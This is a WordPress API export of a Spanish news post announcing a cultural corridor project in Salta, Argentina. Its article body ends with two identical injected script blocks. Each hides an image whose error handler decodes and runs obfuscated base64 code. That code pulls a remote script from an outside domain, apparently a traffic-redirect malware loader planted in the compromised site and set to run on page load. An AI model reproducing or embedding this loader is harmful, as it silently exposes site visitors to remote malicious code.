{"id":3669,"date":"2024-02-09T10:49:37","date_gmt":"2024-02-09T13:49:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3669"},"modified":"2025-08-14T00:00:52","modified_gmt":"2025-08-14T03:00:52","slug":"provincia-y-municipio-lanzan-el-corredor-cultural-de-los-barrios","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3669","title":{"rendered":"Provincia y Municipio lanzan el Corredor Cultural de los Barrios"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8b679d640bae6ef4e5c1cba3d5fdfb8e\" style=\"background-color:#7c064f\"><em>La iniciativa que busca poner en valor el Mercado Artesanal de Salta, el Centro Cultural Dino Saluzzi y la Casona de Casta\u00f1ares como polos culturales y patrimoniales de la zona, se presentar\u00e1 hoy 9 de febrero a las 11 horas en la Casona de Casta\u00f1ares.<\/em><\/h4>\n\n\n\n<p>En un trabajo articulado entre la Secretar\u00eda de Cultura de la Provincia y la Agencia de Cultura de la Municipalidad de Salta, el Corredor Cultural de los Barrios busca resaltar la historia, patrimonio, arte y cultura de estos espacios emblem\u00e1ticos de la Ciudad.<\/p>\n\n\n\n<p>El lanzamiento se realizar\u00e1 hoy&nbsp;viernes 9 de febrero a las 11 horas en la Casona de Casta\u00f1ares, Av. Bernardo Houssay S\/N Barrio 15 de Febrero manzana E casa 30, con la presencia de autoridades provinciales y municipales.<\/p>\n\n\n\n<p>El Corredor ser\u00e1 un espacio para que los trabajadores de la cultura puedan generar propuestas gratuitas de diversas \u00edndoles, que acerquen a la comunidad a estos espacios y promuevan adem\u00e1s el sentido de pertenencia.<\/p>\n\n\n\n<p>La agenda de actividades ser\u00e1 conjunta y se definir\u00e1n tem\u00e1ticas mensuales que se replicar\u00e1n en los tres espacios. La misma dar\u00e1 inicio con actividades de Carnaval.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/provincia-y-municipio-lanzan-el-corredor-cultural-de-los-barrios-94096\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La iniciativa que busca poner en valor el Mercado Artesanal de Salta, el Centro Cultural Dino Saluzzi y la Casona de Casta\u00f1ares como polos culturales y patrimoniales de la zona, se presentar\u00e1 hoy 9 de febrero a las 11 horas en la Casona de Casta\u00f1ares. En un trabajo articulado entre la Secretar\u00eda de Cultura de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3670,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-3669","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3669"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3669"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3669\/revisions"}],"predecessor-version":[{"id":6856,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3669\/revisions\/6856"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3670"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3669"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3669"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3669"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}